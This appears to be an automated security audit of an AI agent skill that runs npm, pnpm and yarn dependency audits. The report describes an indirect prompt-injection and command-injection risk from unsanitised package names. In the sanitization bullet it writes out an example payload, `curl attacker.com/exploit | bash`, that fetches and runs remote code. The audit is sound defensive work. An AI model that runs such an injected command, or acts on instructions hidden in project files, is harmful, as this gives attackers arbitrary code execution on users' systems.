dependency-audit
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFE (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS)
Full Analysis
- [COMMAND_EXECUTION] (SAFE): The skill executes standard package manager commands such as `npm audit`, `pnpm outdated`, and `yarn audit`. These operations are inherent to the skill's purpose and are expected behavior.
- [EXTERNAL_DOWNLOADS] (LOW): The skill invokes `npx license-checker`, which downloads and executes the latest version of the `license-checker` package from the npm registry. This is a common practice for this functionality but relies on an external, third-party source.
- [INDIRECT_PROMPT_INJECTION] (LOW): The skill exhibits a vulnerability surface for command injection due to how it handles project data.
  - Ingestion points: The skill reads package names directly from `package.json` and tool outputs in `agents/dep-auditor.md` and `commands/audit-deps.md`.
  - Boundary markers: There are no explicit instructions or delimiters to prevent the model from executing malicious strings embedded in these files.
  - Capability inventory: The agent has access to a bash environment and commands like `npm explain [package-name]`, `pnpm why [package-name]`, and `npm update [package]`.
  - Sanitization: No sanitization or escaping is applied to package names before they are interpolated into shell commands. A malicious actor could exploit this by naming a dependency with shell metacharacters (e.g., `"; curl attacker.com/exploit | bash ;"`) to achieve arbitrary code execution.
Audit Metadata